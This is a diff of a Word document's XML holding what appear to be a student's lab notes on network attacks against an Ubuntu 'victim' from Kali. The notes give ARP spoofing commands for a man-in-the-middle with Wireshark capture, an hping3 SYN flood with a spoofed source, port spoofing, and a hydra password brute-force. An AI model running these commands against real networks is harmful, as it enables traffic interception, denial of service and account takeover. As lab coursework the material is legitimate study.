--- a/mydoc.docx
+++ b/mydoc.docx
@@ -13,248 +13,98 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Notedown</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">Notedown ip address of both </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Run this to get gateway ip and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">victim ip </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install arp-scan -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">sudo arp-scan --interface=eth0 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t>localnet</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>This keeps the Ubuntu victim online while you're in the middle.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>on kali :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install dsniff -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>for gateway ip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ip route</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>sudo sysctl -w net.ipv4.ip_forward=1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">sudo arpspoof -i eth0 -t targetip </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Terminal 1: Tell Victim you're the Gateway</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">sudo arpspoof -i eth0 -t </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ubuntu_ip</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> address of both </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Run this to get gateway </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">victim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-scan -y</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-scan --interface=eth0 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>–</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>localnet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>This keeps the Ubuntu victim online while you're in the middle.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">echo 1 | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tee /proc/sys/net/ipv4/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip_forward</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>kali :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dsniff</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -y</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">for gateway </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> route</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arpspoof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> eth0 -t </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>targetip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Terminal 1: Tell Victim you're the Gateway</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arpspoof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> eth0 -t </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ubuntu_ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">gateway </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>gateway ip</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -273,119 +123,44 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arpspoof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> eth0 -t </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gateway_ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ubuntu_ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">go above and apply </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>filter :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ip.addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> == </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ubuntu </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">in </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ubuntu :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ping google.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">sudo arpspoof -i eth0 -t </w:t>
+      </w:r>
+      <w:r>
+        <w:t>gateway_ip ubuntu_ip</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>sudo wireshark</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">go above and apply filter : </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ip.addr == </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ubuntu ip</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>in ubuntu : ping google.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>wireshark :</w:t>
+      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -659,13 +434,8 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  192.168.146.130</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> → Your </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  192.168.146.130 → Your </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -676,13 +446,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  142.250.71.36</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> → A </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  142.250.71.36 → A </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -697,13 +462,8 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  Your</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  Your </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -717,7 +477,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
@@ -726,28 +485,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Google</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> replied</w:t>
+        <w:t>Google replied</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> with a response (1243)</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  These</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are perfectly paired request/reply ICMP packets</w:t>
+      <w:r>
+        <w:t>  These are perfectly paired request/reply ICMP packets</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -913,6 +659,7 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>--------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
     </w:p>
@@ -1226,13 +973,8 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  Kali</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  Kali </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1246,13 +988,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ping </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  The ping </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1266,13 +1003,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  Victim</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sees a ping </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  Victim sees a ping </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1283,13 +1015,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>  Victim</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">  Victim </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1307,37 +1034,20 @@
       <w:r>
         <w:t xml:space="preserve">hping3 --flood -p 80 192.168.1.102 -S –spoof </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>spoofed_ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hexedit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hexedit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file name</w:t>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install hexedit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>hexedit file name</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1355,7 +1065,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Port spoofing</w:t>
       </w:r>
       <w:r>
@@ -1568,15 +1277,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>--</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>baseport</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 53</w:t>
+              <w:t>--baseport 53</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1648,91 +1349,24 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hping3 -S -p 80 --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>baseport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 53 192.168.146.130</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -y</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usermod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aG</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> $USER</w:t>
+        <w:t>sudo hping3 -S -p 80 --baseport 53 192.168.146.130</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install wireshark -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>sudo usermod -aG wireshark $USER</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1749,23 +1383,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">hydra -l </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>divyesh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -P '/home/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>divyesh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">/Desktop/message.txt' </w:t>
+        <w:t xml:space="preserve">hydra -l divyesh -P '/home/divyesh/Desktop/message.txt' </w:t>
       </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
